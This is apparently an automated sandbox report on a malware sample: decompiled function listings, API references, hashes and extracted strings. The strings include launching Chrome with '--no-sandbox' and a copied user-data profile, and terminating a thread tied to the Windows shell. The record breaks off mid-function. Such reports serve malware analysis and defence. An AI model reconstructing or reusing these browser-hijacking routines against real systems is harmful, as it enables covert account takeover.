GetTempPathW.KERNEL32 ref: 00C7F5BB
lstrcatW.KERNEL32 ref: 00C7F5D3
lstrlenA.KERNEL32 ref: 00C7F5E8
MultiByteToWideChar.KERNEL32 ref: 00C7F635
lstrcpyW.KERNEL32 ref: 00C7F645
lstrcatW.KERNEL32 ref: 00C7F656
HeapFree.KERNEL32 ref: 00C7F677

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HeapPathTemplstrcat$AllocByteCharFreeMultiWidelstrcpylstrlen
String ID:
API String ID: 2712064585-0
Opcode ID: ce183ec71e36f2c81bb10356a5680a8808691f0df195b9acda88bd1ca773687d
Instruction ID: d9052432800b32014614f8b4aa95da73200e5708f4d7b23121fbbba356696276
Opcode Fuzzy Hash: ce183ec71e36f2c81bb10356a5680a8808691f0df195b9acda88bd1ca773687d
Instruction Fuzzy Hash: 5F314372311B8195EB249F21DC98B992361F784BA4F84C325DE2D57BA8DF38C64AC704

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A42C, Relevance: 13.6, APIs: 9, Instructions: 59memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7A974: GetEnvironmentVariableW.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A98D
Part of subcall function 00C7A974: HeapAlloc.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A9A8
Part of subcall function 00C7A974: GetEnvironmentVariableW.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A9C3
Part of subcall function 00C7A974: GetLastError.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A9D5
Part of subcall function 00C7A974: HeapFree.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A9E9
Part of subcall function 00C7A974: SetLastError.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7AA9C

GetLastError.KERNEL32(?,?,?,00C767A8), ref: 00C7A455
lstrlenW.KERNEL32(?,?,?,00C767A8), ref: 00C7A462
lstrlenW.KERNEL32(?,?,?,00C767A8), ref: 00C7A46D
HeapAlloc.KERNEL32(?,?,?,00C767A8), ref: 00C7A487
HeapFree.KERNEL32(?,?,?,00C767A8), ref: 00C7A4D5
SetLastError.KERNEL32(?,?,?,00C767A8), ref: 00C7A4E1

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorHeapLast$AllocEnvironmentFreeVariablelstrlen
String ID:
API String ID: 2453418766-0
Opcode ID: 123ba793b734e441194a7d83e4cc6b26bcf0e18ce4043ce29f06484379a48e71
Instruction ID: 848cea32a481c9e7ab91a14cc31c7a7399dd8f1f2e285e5f7752fd37fb6bdfe2
Opcode Fuzzy Hash: 123ba793b734e441194a7d83e4cc6b26bcf0e18ce4043ce29f06484379a48e71
Instruction Fuzzy Hash: C1111F25304B8086FB14DB62B99872D6361BBC8FD0F88D524DE5A07B25DF7CC5498709

Uniqueness

Uniqueness Score: -1.00%

Function 00C7D0E0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 169
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00C7D0E0(long long __rbx, void* __rcx, intOrPtr* __rdx, signed long long __rdi, long long __rsi, void* __r8, void* __r9) {
				void* __rbp;
				void* _t67;
				int _t69;
				int _t72;
				int _t73;
				int _t74;
				int _t77;
				intOrPtr _t81;
				intOrPtr _t87;
				void* _t90;
				void* _t92;
				void* _t95;
				intOrPtr* _t109;
				signed long long _t118;
				int _t121;
				signed long long _t122;
				int _t123;
				void* _t126;
				int _t128;
				void* _t129;
				void* _t132;
				void* _t136;
				int _t143;
				int _t145;
				long long* _t148;

				_t136 = __r9;
				_t118 = __rdi;
				_t109 = __rdx;
				_t92 = __rcx;
				_t86 = _t128;
				 *((long long*)(_t86 + 0x10)) = __rbx;
				 *((long long*)(_t86 + 0x18)) = __rsi;
				 *((long long*)(_t86 + 0x20)) = __rdi;
				_t126 = _t86 - 0x1248;
				E00C6A4A0();
				_t129 = _t128 - _t86;
				_t90 = __rcx;
				if(__rdx == 0) {
					 *((intOrPtr*)(_t129 + 0x58)) =  *((intOrPtr*)(__rcx + 0x294));
					 *((intOrPtr*)(_t129 + 0x5c)) =  *((intOrPtr*)(__rcx + 0x298));
					 *((long long*)(_t129 + 0x50)) = __rdi;
				} else {
					asm("movups xmm0, [edx]");
					asm("movdqu [esp+0x50], xmm0");
				}
				if(( *(_t92 + 0xb8) & 0x00000010) == 0) {
					r12d = 0;
					r13d = 0;
					EnterCriticalSection(??);
					_t121 =  *((intOrPtr*)(_t90 + 0x1d0));
					__eflags = _t121;
					if(_t121 != 0) {
						_t145 = _t126 + 0x280;
						_t148 = _t129 + 0x60;
						do {
							_t72 = E00C7C134(_t90,  *_t121);
							__eflags = _t72;
							_t77 = 0 | _t72 == 0x00000000;
							 *(_t121 + 0x18) = _t77;
							__eflags = _t77;
							if(_t77 == 0) {
								__eflags =  *_t121 -  *((intOrPtr*)(_t90 + 0xc0));
								if(__eflags != 0) {
									_t81 = 0xfffffff0;
									__imp__GetWindowLongPtrA();
									asm("dec eax");
									if(__eflags >= 0) {
										L11:
										_t115 =  *_t121;
										__eflags =  *_t121 -  *((intOrPtr*)(_t90 + 0xe8));
										if( *_t121 !=  *((intOrPtr*)(_t90 + 0xe8))) {
											_t73 = E00C82150(_t90, _t90, _t115);
											__eflags = _t73;
											if(_t73 == 0) {
												__eflags =  *(_t121 + 0x2c);
												if( *(_t121 + 0x2c) == 0) {
													L16:
													_t86 =  *_t121;
													r12d = r12d + 1;
													 *_t145 = _t86;
													_t145 = _t145 + 8;
													__eflags = _t145;
												} else {
													_t74 = E00C7BB64(_t86, _t90, _t90 + 0x88,  *_t121, _t136);
													__eflags = _t74;
													if(_t74 < 0) {
														goto L16;
													} else {
														_t86 =  *_t121;
														r13d = r13d + 1;
														 *_t148 = _t86;
														_t148 = _t148 + 8;
													}
												}
											}
										}
									} else {
										E00C81DFC(GetParent(), _t90, _t86);
										__eflags = _t86;
										if(_t86 == 0) {
											goto L11;
										}
									}
								}
							}
							_t121 =  *((intOrPtr*)(_t121 + 0x38));
							__eflags = _t121;
						} while (_t121 != 0);
					}
					LeaveCriticalSection();
					_t67 = E00C6ADD8();
					__eflags = _t67 - 5;
					if(_t67 > 5) {
						_t86 =  *((intOrPtr*)(_t90 + 0x38));
						 *((long long*)(_t129 + 0x30)) = _t126 + 0x1250;
						r9d = 0;
						__eflags = r9d;
						 *((intOrPtr*)(_t129 + 0x28)) = 0x3e8;
						_t81 =  *((intOrPtr*)( *((intOrPtr*)(_t90 + 0x38)) + 0x150));
						_t41 = _t136 + 8; // 0x8
						r8d = _t41;
						 *((intOrPtr*)(_t129 + 0x20)) = 2;
						SendMessageTimeoutA(??, ??, ??, ??, ??, ??, ??);
					}
					_t110 =  *(_t90 + 0x110);
					_t132 = _t129 + 0x50;
					r9d = 0;
					_t95 = _t90;
					__eflags =  *(_t90 + 0x110);
					if(__eflags == 0) {
						_t110 =  *((intOrPtr*)(_t90 + 0xc0));
					}
					E00C7CDE8(_t77, _t81, __eflags, _t86, _t90, _t95, _t110, _t121, _t126, _t132);
					_t143 = r12d;
					_t122 = _t118;
					__eflags = r12d;
					if(__eflags > 0) {
						do {
							r9d = 0;
							E00C7CDE8(_t77, _t81, __eflags, _t86, _t90, _t90,  *((intOrPtr*)(_t126 + 0x280 + _t122 * 8)), _t122, _t126, _t129 + 0x50);
							_t122 = _t122 + 1;
							__eflags = _t122 - _t143;
						} while (__eflags < 0);
					}
					_t87 =  *((intOrPtr*)(_t90 + 0x38));
					_t111 =  *((intOrPtr*)(_t87 + 0x110));
					__eflags =  *((intOrPtr*)(_t87 + 0x110)) -  *((intOrPtr*)(_t90 + 0xc0));
					if(__eflags == 0) {
						L26:
						r9d = 1;
						_t69 = E00C7CDE8(_t77, _t81, __eflags, _t87, _t90, _t90,  *((intOrPtr*)(_t90 + 0xe8)), _t122, _t126, _t129 + 0x50);
					} else {
						_t69 = E00C7C0C0(__eflags, _t87, _t90, _t90 + 0x88, _t111, _t122);
						__eflags = _t69;
						if(__eflags == 0) {
							goto L26;
						}
					}
					_t123 = r13d;
					__eflags = r13d;
					if(__eflags > 0) {
						do {
							r9d = 0;
							_t69 = E00C7CDE8(_t77, _t81, __eflags, _t87, _t90, _t90,  *((intOrPtr*)(_t129 + 0x60 + _t118 * 8)), _t123, _t126, _t129 + 0x50);
							_t118 = _t118 + 1;
							__eflags = _t118 - _t123;
						} while (__eflags < 0);
					}
				} else {
					r8d =  *((intOrPtr*)(_t109 + 4));
					r9d =  *(_t109 + 8);
					r9d = r9d -  *_t109;
					 *((intOrPtr*)(_t129 + 0x40)) = 0xcc0020;
					 *((intOrPtr*)(_t129 + 0x38)) = 0;
					 *((intOrPtr*)(_t129 + 0x30)) = 0;
					 *((long long*)(_t129 + 0x28)) =  *((intOrPtr*)(_t90 + 0x718));
					 *((intOrPtr*)(_t129 + 0x20)) =  *((intOrPtr*)(_t109 + 0xc)) - r8d;
					_t69 = BitBlt(??, ??, ??, ??, ??, ??, ??, ??, ??);
				}
				return _t69;
			}

0x00c7d0e0
0x00c7d0e0
0x00c7d0e0
0x00c7d0e0
0x00c7d0e0
0x00c7d0e3
0x00c7d0e7
0x00c7d0eb
0x00c7d0f8
0x00c7d104
0x00c7d109
0x00c7d10e
0x00c7d114
0x00c7d127
0x00c7d131
0x00c7d135
0x00c7d116
0x00c7d116
0x00c7d119
0x00c7d119
0x00c7d141
0x00c7d18f
0x00c7d192
0x00c7d195
0x00c7d19b
0x00c7d1a2
0x00c7d1a5
0x00c7d1ab
0x00c7d1b2
0x00c7d1b7
0x00c7d1ba
0x00c7d1c1
0x00c7d1c3
0x00c7d1c6
0x00c7d1c9
0x00c7d1cb
0x00c7d1d4
0x00c7d1db
0x00c7d1dd
0x00c7d1e2
0x00c7d1e8
0x00c7d1ed
0x00c7d208
0x00c7d208
0x00c7d20b
0x00c7d212
0x00c7d217
0x00c7d21c
0x00c7d21e
0x00c7d220
0x00c7d223
0x00c7d247
0x00c7d247
0x00c7d24a
0x00c7d24d
0x00c7d250
0x00c7d250
0x00c7d225
0x00c7d22f
0x00c7d234
0x00c7d236
0x00000000
0x00c7d238
0x00c7d238
0x00c7d23b
0x00c7d23e
0x00c7d241
0x00c7d241
0x00c7d236
0x00c7d223
0x00c7d21e
0x00c7d1ef
0x00c7d1fe
0x00c7d203
0x00c7d206
0x00000000
0x00000000
0x00c7d206
0x00c7d1ed
0x00c7d1db
0x00c7d254
0x00c7d258
0x00c7d258
0x00c7d1b7
0x00c7d268
0x00c7d26e
0x00c7d273
0x00c7d276
0x00c7d278
0x00c7d283
0x00c7d288
0x00c7d288
0x00c7d292
0x00c7d29a
0x00c7d2a0
0x00c7d2a0
0x00c7d2a4
0x00c7d2ac
0x00c7d2ac
0x00c7d2b2
0x00c7d2b9
0x00c7d2be
0x00c7d2c1
0x00c7d2c4
0x00c7d2c7
0x00c7d2c9
0x00c7d2c9
0x00c7d2d0
0x00c7d2d5
0x00c7d2d8
0x00c7d2db
0x00c7d2de
0x00c7d2e0
0x00c7d2ed
0x00c7d2f3
0x00c7d2f8
0x00c7d2fb
0x00c7d2fb
0x00c7d2e0
0x00c7d300
0x00c7d304
0x00c7d30b
0x00c7d312
0x00c7d324
0x00c7d330
0x00c7d339
0x00c7d314
0x00c7d31b
0x00c7d320
0x00c7d322
0x00000000
0x00000000
0x00c7d322
0x00c7d33e
0x00c7d341
0x00c7d344
0x00c7d346
0x00c7d350
0x00c7d356
0x00c7d35b
0x00c7d35e
0x00c7d35e
0x00c7d346
0x00c7d143
0x00c7d146
0x00c7d14d
0x00c7d158
0x00c7d15d
0x00c7d165
0x00c7d169
0x00c7d16d
0x00c7d172
0x00c7d17d
0x00c7d17d
0x00c7d383

APIs

BitBlt.GDI32 ref: 00C7D17D
EnterCriticalSection.KERNEL32 ref: 00C7D195
GetWindowLongPtrA.USER32 ref: 00C7D1E2
GetParent.USER32 ref: 00C7D1F2
LeaveCriticalSection.KERNEL32 ref: 00C7D268
SendMessageTimeoutA.USER32 ref: 00C7D2AC

Part of subcall function 00C7C134: IsWindowVisible.USER32 ref: 00C7C141
Part of subcall function 00C7C134: GetWindowLongPtrA.USER32 ref: 00C7C153

Strings

, xrefs: 00C7D15D

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$CriticalLongSection$EnterLeaveMessageParentSendTimeoutVisible
String ID:
API String ID: 401506982-3916222277
Opcode ID: 5cd3191dc9867e4fbd879d3a7d868b8812633289150fa82f185cd43a6b9ca914
Instruction ID: 86f0da5f46f6f810c0953403a7c13d7a977911f721e8eaaafea2ce42fea7e0d1
Opcode Fuzzy Hash: 5cd3191dc9867e4fbd879d3a7d868b8812633289150fa82f185cd43a6b9ca914
Instruction Fuzzy Hash: B1619E72600A8186DB20DF66E884B9DB770FB84B98F54D126DE9E57B19DF38C946C700

Uniqueness

Uniqueness Score: -1.00%

Function 00C6A7E0, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 87libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,EB8400006BEB0604,00000000,00C7A25D,?,?,?,?,?,00000000,?,?,?,00C68A52), ref: 00C6A81E
GetLastError.KERNEL32(?,?,?,EB8400006BEB0604,00000000,00C7A25D,?,?,?,?,?,00000000,?,?,?,00C68A52), ref: 00C6A82C
GetProcAddress.KERNEL32(?,?,?,EB8400006BEB0604,00000000,00C7A25D,?,?,?,?,?,00000000,?,?,?,00C68A52), ref: 00C6A843
GetProcAddress.KERNEL32(?,?,?,EB8400006BEB0604,00000000,00C7A25D,?,?,?,?,?,00000000,?,?,?,00C68A52), ref: 00C6A85F

Strings

version.dll, xrefs: 00C6A817
GetFileVersionInfoSizeW, xrefs: 00C6A839
GetFileVersionInfoW, xrefs: 00C6A855

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$ErrorLastLibraryLoad
String ID: GetFileVersionInfoSizeW$GetFileVersionInfoW$version.dll
API String ID: 856020675-3712324480
Opcode ID: 12c2892c24bafd35cc36d2639a651858eed0a3b396698e5198d03df72e303dd5
Instruction ID: 94ef54bc7c1db501a076829bda0ec80d506bfd00f62cc99c93884c239f27c1e9
Opcode Fuzzy Hash: 12c2892c24bafd35cc36d2639a651858eed0a3b396698e5198d03df72e303dd5
Instruction Fuzzy Hash: F931AD25311B50C2FA25DF26A99477873A0FB8CBC0F888525DE5987BA0EF38D956CB05

Uniqueness

Uniqueness Score: -1.00%

Function 00C7CFB4, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00C7CFCC
GetWindowLongPtrA.USER32 ref: 00C7CFFD
GetScrollBarInfo.USER32 ref: 00C7D020
memcpy.NTDLL ref: 00C7D040
GetScrollBarInfo.USER32 ref: 00C7D052
memcpy.NTDLL ref: 00C7D072

Strings

<, xrefs: 00C7D010

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoScrollWindowmemcpy$LongRect
String ID: <
API String ID: 3098753545-4251816714
Opcode ID: 228a1bdf78abf8bbfd02746428e78e8adbc5d70c02e7b8df79f843006920e6ce
Instruction ID: 8fb6d7c7e0eeeb72c45fd0451ddf7af04a07b835d61f87b2d0861917267aa00f
Opcode Fuzzy Hash: 228a1bdf78abf8bbfd02746428e78e8adbc5d70c02e7b8df79f843006920e6ce
Instruction Fuzzy Hash: 9A411572200680CBE724CF39D6847597BB1F744B58F58C229D7598BB88DB38DAA6CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00C7C8D8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32 ref: 00C7C942
FillRect.USER32 ref: 00C7C97F
DrawEdge.USER32 ref: 00C7C996
RedrawWindow.USER32 ref: 00C7C9AC
GdiFlush.GDI32 ref: 00C7C9C0
BitBlt.GDI32 ref: 00C7CA00

Strings

, xrefs: 00C7C9D9

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DrawEdgeFillFlushMessageRectRedrawSendTimeoutWindow
String ID:
API String ID: 3441529251-3916222277
Opcode ID: 1fbe38d4c53676b44ff0be5f19b5406879ae57a14be3ec98e3957c8e6a08e534
Instruction ID: 3eee1ee7a5ddade1941cae826513ba45903a229b308f3fdab2e8a5d6055ea41a
Opcode Fuzzy Hash: 1fbe38d4c53676b44ff0be5f19b5406879ae57a14be3ec98e3957c8e6a08e534
Instruction Fuzzy Hash: DC313A72B107948AE720CF75D884BAD37B0F788B88F659625EE5853B18DF38D545CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00C65590, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52threadstringCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00C655C8
PathStripPathA.SHLWAPI ref: 00C655ED
lstrcmpiA.KERNEL32 ref: 00C655FF
SleepEx.KERNEL32 ref: 00C65636
GetCurrentThread.KERNEL32 ref: 00C6564D
TerminateThread.KERNEL32 ref: 00C65658

Strings

windows.immersiveshell.serviceprovider.dll, xrefs: 00C655F3

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentPathThread$ProcessSleepStripTerminatelstrcmpi
String ID: windows.immersiveshell.serviceprovider.dll
API String ID: 193402735-1793758754
Opcode ID: 7768f837a86c71dd1e7d68554337c9d2e0fc20300c6b86a63a5b9b3f12096609
Instruction ID: 14ecfc4fa30308a25d3322cd4b1f3ab82af7770c497d29afe276fc08924630b5
Opcode Fuzzy Hash: 7768f837a86c71dd1e7d68554337c9d2e0fc20300c6b86a63a5b9b3f12096609
Instruction Fuzzy Hash: CC217C71615E41C6FB318F22FC98BAA2361FB88B95FD48221E95A477A4DF3CC648C700

Uniqueness

Uniqueness Score: -1.00%

Function 00C76DA0, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 34COMMON

Download Yara Rule

APIs

PathRemoveBlanksW.SHLWAPI ref: 00C76DCC
PathRemoveArgsW.SHLWAPI ref: 00C76DD5

Strings

LOCALAPPDATA, xrefs: 00C76E02
--no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11, xrefs: 00C76DE0
chrome.exe, xrefs: 00C76E10
Google\Chrome\User Data, xrefs: 00C76DEC
--user-data-dir=, xrefs: 00C76DF3

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: PathRemove$ArgsBlanks
String ID: --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11$ --user-data-dir=$Google\Chrome\User Data$LOCALAPPDATA$chrome.exe
API String ID: 3367427818-2742134296
Opcode ID: 9dbd9f02be9c4d631c13305b79552afdf29e61fc5d1963a78389d4248d556a87
Instruction ID: 9f9a881554868da91e85192bb1bfd36bd816d7a8e365b778cb9adc3603d3b50d
Opcode Fuzzy Hash: 9dbd9f02be9c4d631c13305b79552afdf29e61fc5d1963a78389d4248d556a87
Instruction Fuzzy Hash: 1D014B75218F8591FB208B11F9407AA73A4F788BD4F44C226EA8D07B28EF7CC155C745

Uniqueness

Uniqueness Score: -1.00%

Function 00C795C8, Relevance: 12.2, APIs: 8, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 00C78C30: WaitForSingleObject.KERNEL32(?,?,00000000,00C7E25E,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C78C3E

GetParent.USER32 ref: 00C79620
GetWindowLongPtrA.USER32 ref: 00C79632
memcpy.NTDLL(?,?,00000000,?,00008001,00000000), ref: 00C79659
GetWindowRect.USER32 ref: 00C7972E
IsRectEmpty.USER32 ref: 00C79798
memcpy.NTDLL(?,?,00000000,?,00008001,00000000), ref: 00C797BB
MapWindowPoints.USER32 ref: 00C797D8
SetWindowPos.USER32(?,?,00000000,?,00008001,00000000), ref: 00C79833

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Rectmemcpy$EmptyLongObjectParentPointsSingleWait
String ID:
API String ID: 3774690360-0
Opcode ID: aa9efaa93de9f7f9a1fb15a6149ad01a6a4ca1f5c9edaf0f07e7b0414d1c939b
Instruction ID: 578bb85acbdac44de3140affbe41ee8a3b290fe0d7e788c9f4828fd224e61ab5
Opcode Fuzzy Hash: aa9efaa93de9f7f9a1fb15a6149ad01a6a4ca1f5c9edaf0f07e7b0414d1c939b
Instruction Fuzzy Hash: D7719C37A107508AEB18CF76C5586AC3BB5F384BA8B16C61ADE1E13B18DF38CA45C740

Uniqueness

Uniqueness Score: -1.00%

Function 00C7B7B0, Relevance: 12.1, APIs: 8, Instructions: 90
windowCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E00C7B7B0(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
				signed int _t22;
				void* _t51;
				void* _t54;
				void* _t57;
				void* _t78;
				void* _t81;
				void* _t85;
				void* _t89;

				_t89 = __r9;
				_t55 = __rbx;
				_t54 = _t85;
				 *((long long*)(_t54 + 8)) = __rbx;
				 *((long long*)(_t54 + 0x10)) = __rbp;
				 *((long long*)(_t54 + 0x18)) = __rsi;
				 *((long long*)(_t54 + 0x20)) = __rdi;
				_t81 = __rdx;
				_t78 = __rcx;
				if(( *(__rcx + 0x30) & 0x00000400) == 0) {
					if(E00C6ADD8() > 5) {
						L4:
						_t22 = E00C7BB64(_t54, _t55, _t78, _t81, _t89);
						if((_t22 & 0x00000020) == 0) {
							GetWindow();
							GetWindow(??, ??);
							_t57 = _t54;
							do {
								if(E00C7C134(_t57, _t57) != 0) {
									__imp__GetWindowLongPtrA();
									E00C7BB64(_t54, _t57, _t78, _t57, _t89);
									GetAncestor(??, ??);
									if((bpl & 0x00000020) == 0 || _t57 == _t81) {
										L13:
										asm("dec ecx");
										if(__eflags < 0) {
											goto L14;
										}
									} else {
										_t51 = _t54 - _t81;
										if(_t51 == 0) {
											goto L13;
										} else {
											asm("dec eax");
											if(_t51 >= 0 || E00C6ADD8() <= 5) {
												r9d = 0;
												r8d = 0;
												PostMessageA(??, ??, ??, ??);
											} else {
												L14:
												__eflags = 0;
												ShowWindow(??, ??);
											}
										}
									}
								}
								_t22 = GetWindow();
								_t57 = _t54;
							} while (_t54 != 0);
						}
					} else {
						_t22 = E00C7BB64(_t54, __rbx, __rcx, __rdx, __r9);
						if((0x00000800 & _t22) == 0) {
							GetAncestor();
							_t22 = E00C7BB64(_t54, _t55, _t78, _t54, __r9);
							if((0x00000800 & _t22) == 0) {
								goto L4;
							}
						}
					}
				}
				return _t22;
			}

0x00c7b7b0
0x00c7b7b0
0x00c7b7b0
0x00c7b7b3
0x00c7b7b7
0x00c7b7bb
0x00c7b7bf
0x00c7b7d0
0x00c7b7d3
0x00c7b7d6
0x00c7b7e4
0x00c7b81f
0x00c7b825
0x00c7b82c
0x00c7b83b
0x00c7b849
0x00c7b84f
0x00c7b852
0x00c7b85c
0x00c7b866
0x00c7b875
0x00c7b884
0x00c7b88e
0x00c7b8c0
0x00c7b8c0
0x00c7b8c5
0x00000000
0x00000000
0x00c7b895
0x00c7b895
0x00c7b898
0x00000000
0x00c7b89a
0x00c7b89a
0x00c7b89f
0x00c7b8ab
0x00c7b8ae
0x00c7b8b8
0x00c7b8c7
0x00c7b8c7
0x00c7b8c7
0x00c7b8cc
0x00c7b8cc
0x00c7b89f
0x00c7b898
0x00c7b88e
0x00c7b8da
0x00c7b8e0
0x00c7b8e3
0x00c7b852
0x00c7b7e6
0x00c7b7ec
0x00c7b7f8
0x00c7b806
0x00c7b812
0x00c7b819
0x00000000
0x00000000
0x00c7b819
0x00c7b7f8
0x00c7b7e4
0x00c7b906

APIs

GetAncestor.USER32 ref: 00C7B806
GetWindow.USER32 ref: 00C7B83B
GetWindow.USER32 ref: 00C7B849
GetWindowLongPtrA.USER32 ref: 00C7B866
GetAncestor.USER32 ref: 00C7B884
PostMessageA.USER32 ref: 00C7B8B8
GetWindow.USER32 ref: 00C7B8DA

Part of subcall function 00C7BB64: GetParent.USER32 ref: 00C7BCA4

ShowWindow.USER32 ref: 00C7B8CC

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Ancestor$LongMessageParentPostShow
String ID:
API String ID: 841378396-0
Opcode ID: 87eedf9789e6ad9aae0f70fba10c0c8284d4d142c0ca73d7d6d5ce79c6f98ae2
Instruction ID: b157c9b5cbc106b89a59bd050f2106afe0ac35c93e49b253f5864528f843cd97
Opcode Fuzzy Hash: 87eedf9789e6ad9aae0f70fba10c0c8284d4d142c0ca73d7d6d5ce79c6f98ae2
Instruction Fuzzy Hash: CB31A221700B4146FF24AB22A9457296369FB89FC4F58D130EE1E47B99EF3CCD46870A

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E238, Relevance: 12.1, APIs: 8, Instructions: 85
stringthreadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00C7E238(void* __edx, void* __eflags, long long __rbx, signed long long* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
				char _v40;
				signed int _t38;
				int _t40;
				long _t43;
				long _t44;
				long _t49;
				signed short _t52;
				signed int _t56;
				signed int _t59;
				signed int _t60;
				signed long long _t65;
				long long _t66;
				char* _t80;
				signed long long* _t81;
				void* _t89;
				void* _t90;

				_t90 = __r10;
